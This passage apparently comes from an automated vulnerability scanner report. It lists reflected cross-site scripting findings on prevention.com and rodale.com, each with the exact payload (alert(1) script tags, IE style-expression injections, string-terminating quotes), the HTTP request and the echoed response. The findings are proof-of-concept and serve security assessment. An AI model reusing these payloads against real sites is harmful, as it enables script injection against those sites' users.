The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a849'%3bdc5a47a7224 was submitted in the REST URL parameter 6. This input was echoed as 4a849';dc5a47a7224 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____4a849'%3bdc5a47a7224 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____4a849';dc5a47a7224&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.124. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7680'style%3d'x%3aexpression(alert(1))'535658b746c was submitted in the REST URL parameter 3. This input was echoed as f7680'style='x:expression(alert(1))'535658b746c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-livingf7680'style%3d'x%3aexpression(alert(1))'535658b746c/pets HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1792
Date: Thu, 10 Mar 2011 17:06:08 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 76723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Livingf7680'style='x:expression(alert(1))'535658b746c-Pets'>
...[SNIP]...

2.125. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a583'%3bb7f1ba5e29d was submitted in the REST URL parameter 3. This input was echoed as 5a583';b7f1ba5e29d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/health/5a583'%3bb7f1ba5e29d/pets HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:07:08 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 75222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, '5a583';b7f1ba5e29d')
                                   </script>
...[SNIP]...

2.126. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/health/healthy-living/pets

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d779c'style%3d'x%3aexpression(alert(1))'8435d74058d was submitted in the REST URL parameter 4. This input was echoed as d779c'style='x:expression(alert(1))'8435d74058d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/health/healthy-living/petsd779c'style%3d'x%3aexpression(alert(1))'8435d74058d HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:08:28 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 77836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Health-Healthy Living-Petsd779c'style='x:expression(alert(1))'8435d74058d'>
...[SNIP]...

2.127. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/news-voices/videos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe72'%3b67a313e6d5a was submitted in the REST URL parameter 3. This input was echoed as dbe72';67a313e6d5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/news-voices/videosdbe72'%3b67a313e6d5a HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:06:45 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 71224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<script language="javascript">
                                       gSiteLife.SummaryBlogsRecentPostsByTag(3, 'videosdbe72';67a313e6d5a')
                                   </script>
...[SNIP]...

2.128. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/news-voices/videos

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fcd4e'style%3d'x%3aexpression(alert(1))'c11f3ed341d was submitted in the REST URL parameter 3. This input was echoed as fcd4e'style='x:expression(alert(1))'c11f3ed341d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/news-voices/videosfcd4e'style%3d'x%3aexpression(alert(1))'c11f3ed341d HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1795
Date: Thu, 10 Mar 2011 17:05:49 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 72150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='News Voices-Videosfcd4e'style='x:expression(alert(1))'c11f3ed341d'>
...[SNIP]...

2.129. http://www.rodale.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7490"><a>1d3c29527fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?a7490"><a>1d3c29527fc=1 HTTP/1.1
Host: www.rodale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:43:51 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 17:43:53 GMT
Date: Thu, 10 Mar 2011 16:43:53 GMT
Connection: close
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/?a7490"><a>1d3c29527fc=1" title="Register" class="moreLink">
...[SNIP]...

2.130. http://www.rodale.com/1,6597,8-114,00.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /1,6597,8-114,00.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d818"><a>1374216a76b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /1,6597,8-114,00.html9d818"><a>1374216a76b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:20:43 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:50:44 GMT
Date: Thu, 10 Mar 2011 17:20:44 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page 1,6597,8-114,00.html9d818"><a>1374216a76b node node-958">
...[SNIP]...

2.131. http://www.rodale.com/1,6597,8-114,00.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /1,6597,8-114,00.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb32"><a>698f26de323 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /1,6597,8-114,00.html?ceb32"><a>698f26de323=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:19:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:49:59 GMT
Date: Thu, 10 Mar 2011 17:19:59 GMT
Content-Length: 22471
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/1,6597,8-114,00.html?ceb32"><a>698f26de323=1" title="Register" class="moreLink">
...[SNIP]...

2.132. http://www.rodale.com/benefits-walking [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /benefits-walking

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7362f"><a>faf41ae25b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /benefits-walking7362f"><a>faf41ae25b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:58 GMT
Date: Thu, 10 Mar 2011 17:05:58 GMT
Content-Length: 22464
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page benefits-walking7362f"><a>faf41ae25b4 node node-958">
...[SNIP]...

2.133. http://www.rodale.com/benefits-walking [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /benefits-walking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bec2"><script>alert(1)</script>ec68e81f22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /benefits-walking?4bec2"><script>alert(1)</script>ec68e81f22b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:56 GMT
Date: Thu, 10 Mar 2011 17:05:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=s63qiq0qr11ee9igm45mapavl7; path=/; domain=.rodale.com
Content-Length: 38442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/benefits-walking?4bec2"><script>alert(1)</script>ec68e81f22b=1&title=8+Astonishing+Benefits+of+Walking">
...[SNIP]...

2.134. http://www.rodale.com/cas [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /cas

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c9f"><a>433b5975bcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cas36c9f"><a>433b5975bcc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:55 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:56 GMT
Date: Thu, 10 Mar 2011 17:07:56 GMT
Content-Length: 22425
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page cas36c9f"><a>433b5975bcc node node-958">
...[SNIP]...

2.135. http://www.rodale.com/caslogin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /caslogin

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b839c"><a>38ac21ff284 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /casloginb839c"><a>38ac21ff284 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:35 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:36 GMT
Date: Thu, 10 Mar 2011 17:05:36 GMT
Content-Length: 22440
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page casloginb839c"><a>38ac21ff284 node node-958">
...[SNIP]...

2.136. http://www.rodale.com/chemicals-plastic [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /chemicals-plastic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e0c2"><a>cdc2ec784d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /chemicals-plastic9e0c2"><a>cdc2ec784d2 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:48 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:50 GMT
Date: Thu, 10 Mar 2011 17:05:50 GMT
Content-Length: 22467
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page chemicals-plastic9e0c2"><a>cdc2ec784d2 node node-958">
...[SNIP]...

2.137. http://www.rodale.com/chemicals-plastic [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /chemicals-plastic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a391"><script>alert(1)</script>fb00446b477 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chemicals-plastic?8a391"><script>alert(1)</script>fb00446b477=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:47 GMT
Date: Thu, 10 Mar 2011 17:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=pnldn7gcqp6dvi8le115h9e464; path=/; domain=.rodale.com
Content-Length: 44125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/chemicals-plastic?8a391"><script>alert(1)</script>fb00446b477=1&title=All+Plastics+Are+Bad+for+Your+Body%2C+New+Study+Finds">
...[SNIP]...

2.138. http://www.rodale.com/contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7bb9"><a>cdd3abcb2cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd7bb9"><a>cdd3abcb2cc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:37 GMT
Date: Thu, 10 Mar 2011 17:07:37 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page contactd7bb9"><a>cdd3abcb2cc node node-958">
...[SNIP]...

2.139. http://www.rodale.com/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cc77"><a>02eecc34017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact?6cc77"><a>02eecc34017=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:49 GMT
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 17:06:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:06:51 GMT
Content-Length: 24362
Connection: close
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=gdnh48fudra7ftjrm96rk8irl0; path=/; domain=.rodale.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
